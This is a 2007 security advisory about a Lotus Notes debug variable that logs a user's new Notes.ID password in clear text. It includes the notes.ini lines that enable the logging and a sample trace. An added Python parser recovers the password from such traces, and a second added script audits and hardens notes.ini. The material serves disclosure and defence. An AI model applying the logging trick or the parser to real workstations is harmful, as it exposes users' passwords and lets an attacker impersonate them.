
[NEWS] Lotus Notes Password Exposure

Subject: [NEWS] Lotus Notes Password Exposure
Date: 22 Jul 2007 14:05:49 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Lotus Notes Password Exposure
------------------------------------------------------------------------


SUMMARY

This advisory discusses the possibility of using an unpublished Lotus 
Notes debug variable in an attack to learn a Notes.ID password. The 
notes.ini parameter exists for troubleshooting the password quality check, 
but it can be used to log the user's new password in clear text. To 
exploit it, all of the following must hold:

(1) The attacker must compromise the workstation in order to set this 
parameter, or must have the administrative rights needed to push out a 
notes.ini change via a policy

(2) User must restart the Notes client

(3) User must be persuaded to change their Notes.id password

(4) Attacker must gather the information from the debug outfile

DETAILS

A debug function in Lotus Notes version 5 and later can be used to write a 
file containing the new password in plain text whenever a user changes 
their password. The function was designed to make the password quality 
check more transparent. If the following two additional lines are entered 
in the Notes.INI configuration file, Notes logs the evaluation:

KFM_ShowEntropy=1
Debug_Outfile=c:\testvowe.txt

During the next password change, Notes creates a file (in this case 
testvowe_TLANB_2007_07_18@17_07_33.txt) with the following content:
18.07.2007 17:07:36 Lotus Notes client started
18.07.2007 17:07:47 Index update process started
Entering SpellCheckInit
entropy.c SpellCheckAccess Get 13A834 0
Initializing spell checking code
SPELLInitialize succeeded; spell checking DLL loaded
SPELLInitMainDict succeeded
SPELLInitUserDict succeeded
Password Entropy: spell checking code initialized
SpellCheckInit succeeded
Bytes per char: 1
Distribution base multiplier: 6
Resulting entropy limit: 60
[c]alp[c]: 0
[c]alp[t]: 0
[-]alp-s[-]: 18
[t]nalp-s[t]: 18
[t]alp[e]: 18
[t]alp[s]: 18
[t]alp[t]: 18
Testing word: [test]
Searching for [test]
Found [test], worth 12 bits
[2]alp-s[2]: 36
[2]nalp[3]: 42
[2]nalp[4]: 48
Entropy as determined by the state machine: 48

Entropy Limit: 60
Current Entropy: 48
Final Entropy: 48

Final Entropy: 48 bits, 12 chars
entropy.c SpellCheckAccess Put 422EB60 F01069BD

The password can be read from the lines that follow "Resulting entropy 
limit: 60": each transition line holds one password character in its 
trailing pair of square brackets, and concatenating those characters in 
order gives ct-test234.
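As an added example (not part of the advisory, of heise's article or of any IBM tooling), the following Python script parses a Debug_Outfile listing and reconstructs the new password the way an attacker who has collected the file would. It embeds the excerpt shown above. The reading that each "[x]state[y]: n" line carries the character just consumed in its second pair of brackets is an inference from that listing; it yields exactly the ct-test234 the advisory reports. The function names and the handling of several evaluations in one file are assumptions made for this example, not documented Notes behaviour.

```python
import re

# Excerpt of the Debug_Outfile listing from the advisory above, embedded here
# so the parser runs offline. Only the password-quality section is kept.
SAMPLE_DEBUG_OUTFILE = """\
18.07.2007 17:07:36 Lotus Notes client started
18.07.2007 17:07:47 Index update process started
Entering SpellCheckInit
Password Entropy: spell checking code initialized
SpellCheckInit succeeded
Bytes per char: 1
Distribution base multiplier: 6
Resulting entropy limit: 60
[c]alp[c]: 0
[c]alp[t]: 0
[-]alp-s[-]: 18
[t]nalp-s[t]: 18
[t]alp[e]: 18
[t]alp[s]: 18
[t]alp[t]: 18
Testing word: [test]
Searching for [test]
Found [test], worth 12 bits
[2]alp-s[2]: 36
[2]nalp[3]: 42
[2]nalp[4]: 48
Entropy as determined by the state machine: 48

Entropy Limit: 60
Current Entropy: 48
Final Entropy: 48

Final Entropy: 48 bits, 12 chars
entropy.c SpellCheckAccess Put 422EB60 F01069BD
"""

# Each password character produces one transition line of the form
# "[run-start]state[char]: entropy". Inference from the listing: the character
# the state machine has just consumed is the one in the second pair of
# brackets; the first pair repeats the character that opened the current run.
TRANSITION = re.compile(r"^\[(.)\]([A-Za-z-]+)\[(.)\]: (\d+)$")
LIMIT = re.compile(r"^Resulting entropy limit: (\d+)$")
DICT_HIT = re.compile(r"^Found \[(.+?)\], worth (\d+) bits$")
FINAL = re.compile(r"^Final Entropy: (\d+) bits, (\d+) chars$")


def extract_password_evaluations(text):
    """Return one record per password-quality evaluation found in the log.

    A Debug_Outfile may hold several evaluations if the user changed the
    password more than once in a session (an assumption for this example),
    so a new record is opened at every "Resulting entropy limit" line.
    """
    evaluations = []
    current = None
    for line in text.splitlines():
        line = line.rstrip()
        m = LIMIT.match(line)
        if m:
            current = {"limit": int(m.group(1)), "chars": [],
                       "dictionary_words": [], "final_bits": None}
            evaluations.append(current)
            continue
        if current is None:
            continue  # client start-up noise before the first evaluation
        m = TRANSITION.match(line)
        if m:
            current["chars"].append(m.group(3))  # the consumed character
            continue
        m = DICT_HIT.match(line)
        if m:
            current["dictionary_words"].append(m.group(1))
            continue
        m = FINAL.match(line)
        if m:
            current["final_bits"] = int(m.group(1))
    for ev in evaluations:
        ev["password"] = "".join(ev.pop("chars"))
    return evaluations


if __name__ == "__main__":
    for ev in extract_password_evaluations(SAMPLE_DEBUG_OUTFILE):
        print(f"password={ev['password']!r} entropy={ev['final_bits']}/{ev['limit']} "
              f"dictionary_words={ev['dictionary_words']}")
```

Everything the client writes to Debug_Outfile for other subsystems (spell checker initialisation, index updates) is ignored, so the parser only depends on the entropy trace; the dictionary hits are kept because they tell the attacker which part of the password the quality check already considered weak.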

IBM published the debug parameter in a support document but has since 
removed it. At present the document can still be read in the Google cache: 
<http://64.233.183.104/search?q=cache:0AKDTeu1macJ:www-1.ibm.com/support/docview.wss%3Fuid%3Dswg21196682+kfm_showentropy&hl=en&ct=clnk&cd=3&gl=uk>

Since the Notes.INI file on the user's hard disk must be manipulated, 
exploiting this flaw requires access to that file. Although this usually 
means local access, Notes itself offers several ways to change the file 
from a central location, and the same mechanisms can be used to protect 
systems from this vulnerability:
1. From Notes 7 upwards, settings in NOTES.INI can be made on the basis of 
workstation policies, which makes it possible to enforce the setting 
"KFM_ShowEntropy=0".

2. An undocumented way to make the same setting exists in Notes 6: a field 
named $PrefKFM_ShowEntropy with the value 0 must be added to the policy 
document.

3. Alternatively, the setting may be made with the following short 
LotusScript:

      Dim s As New NotesSession
      ' Third argument True writes the variable without a "$" prefix, i.e. as a plain notes.ini setting
      Call s.SetEnvironmentVar("KFM_ShowEntropy", "0", True)

If this script runs automatically whenever a user opens their mail 
database, the setting is re-applied each time. See also the IBM support 
document at 
<http://www-1.ibm.com/support/docview.wss?rs=203&uid=swg21210786>.
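To turn the three mitigations above into something checkable, here is an added Python example (not from the advisory, IBM or heise) that audits a notes.ini for the KFM_ShowEntropy/Debug_Outfile pair, rewrites it to the safe KFM_ShowEntropy=0 form, and names the trace files an earlier exposure would have left behind. The notes.ini samples are constructed for the example; the trace-file naming pattern (base name plus host and timestamp suffix) is inferred from the file name testvowe_TLANB_2007_07_18@17_07_33.txt in the listing above; the path of notes.ini on a given workstation is an assumption the caller has to supply.

```python
import re

# Constructed notes.ini excerpts for this example (not taken from any real
# workstation). The first carries the two debug lines from the advisory, the
# second is how the file should look afterwards.
WEAK_NOTES_INI = """\
[Notes]
Directory=C:\\notes\\data
KitType=1
KFM_ShowEntropy=1
Debug_Outfile=c:\\testvowe.txt
"""

SAFE_NOTES_INI = """\
[Notes]
Directory=C:\\notes\\data
KitType=1
KFM_ShowEntropy=0
"""

# notes.ini is a flat key=value file under a single [Notes] header.
KEY_VALUE = re.compile(r"^\s*([^=;\[\]]+?)\s*=\s*(.*?)\s*$")


def parse_notes_ini(text):
    """Return {key.lower(): value}; a later duplicate key overrides an earlier one.

    Keys are lowercased so that KFM_ShowEntropy and kfm_showentropy count as
    the same setting, matching the client's case-insensitive lookup.
    """
    settings = {}
    for line in text.splitlines():
        m = KEY_VALUE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2)
    return settings


def audit_notes_ini(text):
    """Return findings about the password-logging debug settings; [] is clean."""
    settings = parse_notes_ini(text)
    entropy = settings.get("kfm_showentropy", "").strip()
    outfile = settings.get("debug_outfile", "").strip()
    findings = []
    if entropy == "1":
        findings.append("KFM_ShowEntropy=1: password-quality trace is enabled")
    if outfile:
        findings.append(f"Debug_Outfile={outfile}: client debug output is written to disk")
    if entropy == "1" and outfile:
        findings.append(
            f"both set: the next password change is logged in clear text next to {outfile}")
    return findings


def harden_notes_ini(text):
    """Force KFM_ShowEntropy=0 and drop every Debug_Outfile line, keeping the rest.

    All occurrences of both keys are removed so that a duplicate earlier in the
    file cannot silently re-enable the trace; the safe value is written once,
    at the position of the first KFM_ShowEntropy line or at the end.
    """
    kept, placed = [], False
    for line in text.splitlines():
        m = KEY_VALUE.match(line)
        key = m.group(1).lower() if m else None
        if key == "debug_outfile":
            continue
        if key == "kfm_showentropy":
            if not placed:
                kept.append("KFM_ShowEntropy=0")
                placed = True
            continue
        kept.append(line)
    if not placed:
        kept.append("KFM_ShowEntropy=0")  # pin it even where it was merely unset
    return "\n".join(kept) + "\n"


def trace_file_glob(outfile):
    """Glob for the files an exposure would already have produced.

    Inferred from the listing above: Debug_Outfile=c:\\testvowe.txt produced
    testvowe_TLANB_2007_07_18@17_07_33.txt, i.e. base name, host and timestamp.
    """
    base, dot, ext = outfile.rpartition(".")
    return f"{base}_*.{ext}" if dot else f"{outfile}_*"


if __name__ == "__main__":
    for finding in audit_notes_ini(WEAK_NOTES_INI):
        print("FINDING:", finding)
    print(harden_notes_ini(WEAK_NOTES_INI))
    print("hunt for:", trace_file_glob(r"c:\testvowe.txt"))
```

Run it against the contents of each workstation's notes.ini and delete any files matched by the glob, since they hold the previously changed password. A local rewrite can be undone by anyone who can edit the file, so on Notes 7 and later the policy-based enforcement of KFM_ShowEntropy=0 described in point 1 is what makes the fix stick.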

Assessment:
Notes uses the password to protect the Notes.ID file, the certificate store 
that every user needs for authentication; the file is encrypted and 
decrypted with the user's password. Besides the Notes certificates, 
Notes.ID also holds the user's private key and, where required, X.509 
certificates. It is therefore essential that nobody can obtain a copy of 
the password and of the Notes.ID at the same time: anyone who gains access 
to both the log file and the Notes.ID can authenticate as that user at any 
time.

Even though administrators can prevent exploitation of this debug function 
in most cases, a Notes administrator with the appropriate privileges is 
able to discover all user passwords.

Unlike under Windows, a Notes administrator cannot reset a forgotten 
password, since the password is only ever used to decrypt the Notes.ID. 
Some Notes customers have therefore implemented elaborate solutions for 
the central storage of password changes, in which a reset is only possible 
under the four-eyes principle, i.e. administration and audit must act 
together. The debug function makes it possible to bypass this security 
measure.

Update:
In its <http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21266085> 
response to 'Password exposure in Lotus Notes' by heise Security, IBM 
essentially confirms the vulnerability. It rates the severity as rather 
low (Overall CVSS Score: 0.9) but does not discuss the numerous 
possibilities for remote administration of Notes clients, which can only 
be reliably prevented by using all available access restrictions (ECL = 
Execution Control Lists); this is often not the case. According to IBM, 
"Lotus Notes versions 8.0, 7.0.3 and all future versions will contain a 
fix that will remove the use of this undocumented debug variable."


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ju@heisec.de> Juergen 
Schmidt.
The original article can be found at:  
<http://www.heise-security.co.uk/news/92958> 




DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 



